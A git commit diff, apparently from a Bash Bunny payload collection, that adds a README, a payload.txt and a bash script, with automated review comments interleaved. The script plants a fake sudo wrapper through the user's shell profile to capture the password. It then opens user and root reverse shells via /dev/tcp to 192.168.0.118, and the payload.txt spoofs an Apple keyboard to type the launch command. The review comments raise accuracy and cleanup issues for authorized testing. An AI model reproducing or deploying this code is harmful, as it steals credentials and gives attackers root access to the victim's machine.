Updated changes suggested by darren
parent
27332a9f14
commit
7103031e6e
|
@ -0,0 +1,17 @@
|
||||||
|
# Root_Reverse_Shell_linux_mac
|
||||||
|
|
||||||
|
### Since i dont have a bash bunny this is tested in digispark
|
||||||
|
### I have converted this script to bash bunny
|
||||||
|
### If any issues put in discussion i will fix it
|
||||||
|
POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
|
||||||
|
### Special thanks to sudobackdoor for bash script sample
|
||||||
|
Dont forgot to change IP in payload.sh
|
||||||
|
Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
|
||||||
|
Because it gives both user shell and root shell
|
||||||
|
|
||||||
|
When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server
|
||||||
|
then executes it and removes the payload.sh.
|
||||||
|
|
||||||
|
Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
|
||||||
|
|
||||||
|
The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.
|
|
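Review bot: The README's description of the execution flow does not match the rest of this commit. It says the payload runs "in a machine wich is neither linux nor mac" and that payload.sh is downloaded from a server, executed and then removed, but the title is Root_Reverse_Shell_linux_mac and payload.txt types `bash /Volumes/BashBunny/payloads/switch1/payload.sh`, which runs the script from the device's storage with no download or removal step. Please make the README state the actual flow, and add a short section listing what the script changes on the machine under test (the `~/.config/sudo/sudo` wrapper, the PATH line appended to `~/.bash_profile` or `~/.bashrc`, and the `~/.darkbash` / `~/.darkbashrc` copies) so that whoever runs this on an authorized engagement, or cleans up after it, can confirm everything has been reverted.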
@ -0,0 +1,55 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
if [ ! -d ~/.config/sudo ]
|
||||||
|
then
|
||||||
|
mkdir -p ~/.config/sudo
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -f ~/.config/sudo/sudo ]
|
||||||
|
then
|
||||||
|
rm ~/.config/sudo/sudo
|
||||||
|
fi
|
||||||
|
|
||||||
|
|
||||||
|
echo '#!'$SHELL >> ~/.config/sudo/sudo
|
||||||
|
cat <<'EOF' >> ~/.config/sudo/sudo
|
||||||
|
/usr/bin/sudo -n true 2>/dev/null
|
||||||
|
if [ $? -eq 0 ]
|
||||||
|
then
|
||||||
|
/usr/bin/sudo $@
|
||||||
|
else
|
||||||
|
echo -n "[sudo] password for $USER: "
|
||||||
|
read -s pwd
|
||||||
|
echo
|
||||||
|
echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
|
||||||
|
if [ $? -eq 1 ]
|
||||||
|
then
|
||||||
|
echo "Sorry, try again."
|
||||||
|
sudo $@
|
||||||
|
else
|
||||||
|
/usr/bin/sudo -S $@
|
||||||
|
if [ -f ~/.bash_profile ]
|
||||||
|
then
|
||||||
|
rm ~/.bash_profile
|
||||||
|
mv ~/.darkbash ~/.bash_profile
|
||||||
|
else
|
||||||
|
rm ~/.bashrc
|
||||||
|
mv ~/.darkbashrc ~/.bashrc
|
||||||
|
fi
|
||||||
|
rm ~/.config/sudo/sudo
|
||||||
|
echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) &
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod u+x ~/.config/sudo/sudo
|
||||||
|
if [ -f ~/.bash_profile ]
|
||||||
|
then
|
||||||
|
cp ~/.bash_profile ~/.darkbash
|
||||||
|
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||||
|
else
|
||||||
|
cp ~/.bashrc ~/.darkbashrc
|
||||||
|
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
|
||||||
|
fi
|
||||||
|
disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) &
|
||||||
|
bash
|
|
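Review bot: Cleanup only runs on the success path of the generated wrapper (the inner `else` branch after `/usr/bin/sudo -S $@`), so on a machine where sudo is never run with a correct password the wrapper at `~/.config/sudo/sudo`, the appended `export PATH=~/.config/sudo:$PATH` line and the `~/.darkbash` or `~/.darkbashrc` copy all stay in place indefinitely. The restore step is also lossy: `rm ~/.bashrc` followed by `mv ~/.darkbashrc ~/.bashrc` (and the `.bash_profile` equivalent) puts back the copy taken at install time, silently discarding any edits the user made to the profile in between. Suggest reverting only the single appended line instead of swapping the whole file, and documenting a manual removal procedure for the case where the success branch is never reached.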
@ -0,0 +1,49 @@
|
||||||
|
# Title: Linux/Mac Reverse Shell
|
||||||
|
# Author: Darkprince(Sridhar)
|
||||||
|
# Version: 1.0
|
||||||
|
#
|
||||||
|
# Runs a script in the background that gives a user shell initially and waits for user to
|
||||||
|
# escalate privileges and give a root reverse shell
|
||||||
|
#
|
||||||
|
# Magenta..................Setup
|
||||||
|
# Red,Green,Blue......Executing
|
||||||
|
# Green....................Finished
|
||||||
|
|
||||||
|
|
||||||
|
# INITIALIZING
|
||||||
|
LED W
|
||||||
|
|
||||||
|
# Mac keyboard works in linux and mac
|
||||||
|
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||||
|
|
||||||
|
LANGUAGE='us'
|
||||||
|
|
||||||
|
# Make sure the switch position is 1
|
||||||
|
|
||||||
|
# ATTACKING
|
||||||
|
LED R G B
|
||||||
|
|
||||||
|
# Get linux,mac Termial
|
||||||
|
RUN UNITY xterm
|
||||||
|
Q DELAY 1000
|
||||||
|
# To close opened window by linux run command
|
||||||
|
Q GUI Q
|
||||||
|
Q CTRL C
|
||||||
|
RUN OSX terminal
|
||||||
|
Q DELAY 1000
|
||||||
|
|
||||||
|
# If linux then clearing 'terminal' which is typed by mac run script
|
||||||
|
Q CTRL C
|
||||||
|
|
||||||
|
# Executing bash script which is same for mac and linux
|
||||||
|
Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh
|
||||||
|
|
||||||
|
# The cleanup process will done by bash script
|
||||||
|
# Closing the xterm in linux
|
||||||
|
# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal
|
||||||
|
Q GUI Q
|
||||||
|
Q CTRL C
|
||||||
|
Q STRING exit
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED G
|
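Review bot: The header comments do not match what the script does. The legend lists "Magenta..................Setup", but the INITIALIZING step sets `LED W`, and the only colours used are `LED W`, `LED R G B` and `LED G`; please update the legend or the LED calls so the status colours can be trusted. Likewise the comment "Executing bash script which is same for mac and linux" sits above `Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh`, which hard-codes both switch1 and a `/Volumes` mount path, and the README says this was only tested on a digispark, so the comments should say which platform and switch position the line was actually verified on rather than claiming both.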